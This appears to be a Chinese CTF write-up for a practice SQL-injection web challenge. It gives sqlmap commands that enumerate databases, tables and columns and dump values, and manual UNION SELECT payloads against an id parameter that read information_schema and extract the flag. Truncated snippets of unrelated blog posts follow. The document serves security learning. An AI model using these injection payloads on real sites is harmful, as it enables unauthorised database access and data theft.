①使用sqlmap
sqlmap.py -u "" --dbs 查資料庫名
sqlmap.py -u "" -d my_db --tables 查表名
sqlmap.py -u "" -d my_db -t thiskey --columns 查列名
sqlmap.py -u "" -d my_db -t thiskey -c k0y --dump 查值
得到flag
②手注首先使用1,1』,1」,1#,1』#,1」#.....進行試探
發現1』會報錯試試?id=1』 union select 1,2,3
發現會報錯。。。。直接使用?id=1 union select 1,2,3,發現成功回顯了個
2,所以這裡直接在
2處進行注入查詢
?id=1 union select 1,schema_name from information_schema.schemata,3 查資料庫
?id=1 union select 1,table_schema,table_name from information_schema.tables,3 查表
?id=1 union select 1,table_name,column_name from information_schema.columns,3 查列
?id=1 union select 1,k0y from thiskey,3 查資訊
得到flag
(注:如果沒有顯示也沒法報錯,則可能伺服器出問題了)
實驗吧ctf web題 這個看起來有點簡單
從今天開始做實驗吧的ctf習題,爭取一天一道,一天一總結,做到不貪多,不糊弄,每天學習一點點,每天進步一點點。今天做的是這個看起來有點簡單這個題,是一道sql注入的題目。用了兩種方法,一種就是從url進行sql注入,一種是使用sqlmap工具。1.sql中union的用法 union操作符用於合併兩...
libQGLViewer看起來不錯
今天在windows下用原始碼編譯了qglviewer,試了幾個例子,看起來還不錯。先試用一段時間,如果成熟的話,作為mesh deformer的基礎也不錯。使用qmake可以將.pro轉換成vs的工程檔案或mac下的xcode工程。在windows下我用的是 win32 msvc2005 win3...
實驗吧 web之「看起來有點難」詳解
工具 kali sqlmap 解題思路及方法 首先進入題目鏈結,看到這個分值,不禁讓我很擔心,這還是我第乙個50分值的題目,而且難度也是難,給的說明也是那麼霸氣。這些資訊都在向我們透露這題的難度,我也是抱著嘗試的心理去試試,並沒想著能做出來。進入解題鏈結,是乙個登入網頁,還有一些提示資訊 好吧,按著...